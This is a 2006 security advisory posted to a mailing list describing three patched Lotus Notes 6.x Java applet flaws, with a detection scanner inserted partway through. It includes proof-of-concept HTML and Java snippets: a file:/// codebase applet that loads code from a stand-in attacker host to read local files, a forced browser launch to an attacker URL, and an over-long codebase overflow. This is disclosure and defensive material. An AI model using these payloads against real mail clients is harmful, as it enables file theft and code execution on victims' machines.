[NT] Details of Lotus Notes Java Applet vulnerabilities

Subject: [NT] Details of Lotus Notes Java Applet vulnerabilities
Date: 10 Oct 2006 18:06:29 +0200
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com



  Details of Lotus Notes Java Applet vulnerabilities
------------------------------------------------------------------------


SUMMARY

Lotus Notes is "a groupware/e-mail system developed by Lotus Software. Due 
to its security and collaboration features it's used particularly by large 
organizations, government agencies, etc. IBM estimates it is used by 60 
million people".

Out of academic interest, Jouko is posting some technical details of three 
old Lotus Notes 6.0x/6.5x vulnerabilities. IBM was notified during 
July-August 2004 and a fix is available.

DETAILS

Vulnerable Systems:
 * Lotus Notes version 6.5.3 and prior
 * Lotus Notes version 6.0.4 and prior

Immune Systems:
 * Lotus Notes version 6.5.4
 * Lotus Notes version 6.0.5

The vulnerabilities involve Java applets embedded in HTML formatted e-mail 
messages. A contributing factor in all of the issues is that such Java 
applets are automatically loaded and displayed when the e-mail message is 
viewed (unlike with most e-mail clients, which do not run applets from 
mail at all).

Vulnerability 1: global file read access
An e-mail message containing a Java Applet with the codebase "file:///" 
gains unlimited read access to local files when the e-mail is viewed. An 
example HTML snippet follows:
   <applet codebase="file:///"
           archive="http://www.attacker.tld/applet.jar"
           width="1" height="1"></applet>

The applet's Java bytecode itself need not be contained in the e-mail; it 
is only referenced by the archive URL and is fetched and loaded 
automatically when the e-mail is viewed. Because of the "file:///" 
codebase, the applet runs with file read access on the local system (it can 
read whatever files the currently logged in user can, and list hard drive 
contents). The applet can then use e.g. JavaScript to relay the files to 
the attacker.

Vulnerability 2: launching web browser
A Java applet embedded in the same way can forcibly launch a web browser 
with the desired URL when an e-mail message is viewed. An example piece of 
Java code to do this follows:
   public void init() {
     getAppletContext().showDocument("http://www.attacker.tld/ie-exploits.html");
   }

Under default settings, Internet Explorer is launched and the attacker 
supplied URL is opened in it when the e-mail message is viewed. This 
exposes the system to Internet Explorer vulnerabilities, greatly widening 
the attack surface.

Vulnerability 3: codebase buffer overflow
Opening an HTML e-mail message which contains an applet tag with a long 
codebase parameter (over 500 bytes) causes an apparently stack-based 
buffer overflow condition. It may be exploitable to run arbitrary code on 
the victim system when the e-mail message is viewed. This is an example 
piece of HTML to produce it:
   <applet codebase="A:AAAAAAAAAAAAAAA( repeat 520 A's )AAAAAA"
           code="java.applet.Applet" width=100 height=100></applet>

Exploitability of this scenario was NOT confirmed.
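All three issues share one observable precondition: an <applet> tag inside an HTML message body, with a codebase and/or archive attribute that a normal e-mail has no reason to carry. A mail gateway or forensic triage script can therefore flag such messages before the Notes client ever renders them. The following scanner is an added example written for this page, not code from the advisory or from IBM; it uses only the Python standard library, applies the advisory's three indicators (a file-scheme codebase, a codebase longer than the 500-byte threshold the advisory reports, and bytecode fetched from a remote archive URL), and runs over constructed sample messages whose hostnames are placeholders.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Threshold from the advisory: codebase values over 500 bytes triggered the
# apparently stack-based overflow in the Notes client.
MAX_CODEBASE_LEN = 500


class AppletScanner(HTMLParser):
    """Collect every <applet> tag in an HTML message body together with its attributes."""

    def __init__(self):
        super().__init__()
        self.applets = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "applet":
            # attrs is a list of (name, value); value is None for bare attributes
            self.applets.append({name.lower(): (value or "") for name, value in attrs})


def check_applet(attrs):
    """Return a list of finding strings for one applet tag (empty if nothing is suspicious)."""
    findings = []
    codebase = attrs.get("codebase", "")
    archive = attrs.get("archive", "")
    codebase_bytes = len(codebase.encode("utf-8"))

    # Vulnerability 1: a file: codebase gives the applet read access to local files.
    if urlparse(codebase).scheme.lower() == "file":
        findings.append("file-scheme codebase")

    # Vulnerability 3: an over-long codebase attribute overflowed a stack buffer.
    if codebase_bytes > MAX_CODEBASE_LEN:
        findings.append("oversized codebase (%d bytes)" % codebase_bytes)

    # Vulnerabilities 1 and 2: bytecode pulled from a remote host at view time,
    # so the message body alone never shows what code will run.
    archive_url = urlparse(archive)
    if archive_url.scheme.lower() in ("http", "https"):
        findings.append("remote archive from %s" % archive_url.netloc)

    return findings


def scan_html_message(body):
    """Scan one HTML message body; return [(applet_attrs, findings)] for flagged applets only."""
    parser = AppletScanner()
    parser.feed(body)
    parser.close()
    results = []
    for attrs in parser.applets:
        findings = check_applet(attrs)
        if findings:
            results.append((attrs, findings))
    return results


# Constructed sample bodies (placeholder hostnames, not real messages).
SAMPLE_FILE_READ = (
    '<html><body><p>Quarterly report attached.</p>'
    '<applet codebase="file:///" archive="http://www.example.test/applet.jar" '
    'width="1" height="1"></applet></body></html>'
)
SAMPLE_OVERFLOW = (
    '<html><body><applet codebase="A:%s" code="java.applet.Applet" '
    'width=100 height=100></applet></body></html>' % ("A" * 520)
)
SAMPLE_BENIGN = '<html><body><p>Lunch at noon?</p><img src="cid:logo"></body></html>'

if __name__ == "__main__":
    for label, body in (("file-read", SAMPLE_FILE_READ),
                        ("overflow", SAMPLE_OVERFLOW),
                        ("benign", SAMPLE_BENIGN)):
        hits = scan_html_message(body)
        print(label, "->", "clean" if not hits else [f for _, f in hits])
```

The scanner deliberately keys on the attributes the advisory identifies rather than on a specific attacker domain, so it also catches variants that swap the archive host or pad the codebase with characters other than "A"; a gateway that quarantines on any finding would have blocked all three proof-of-concept messages even on an unpatched 6.0.4/6.5.3 client.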

Workaround:
Disabling Java applets can be used to protect from these vulnerabilities. 
To disable Java applets, select File -> Preferences -> User Preferences 
from the Notes client menu and uncheck the option for "Enable Java 
applets."

Solution:
The issues have been addressed in Lotus Notes versions 6.5.4 and 6.0.5. 
For detailed fix information, see
 
http://www-1.ibm.com/support/docview.wss?rs=0&uid=swg21173910&loc=en_US&cs=utf-8&cc=us&lang=en


ADDITIONAL INFORMATION

The information has been provided by Jouko Pynnonen <jouko@iki.fi>.




DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any 
kind. In no event shall we be liable for any damages whatsoever including 
direct, indirect, incidental, consequential, loss of business profits or 
special damages.



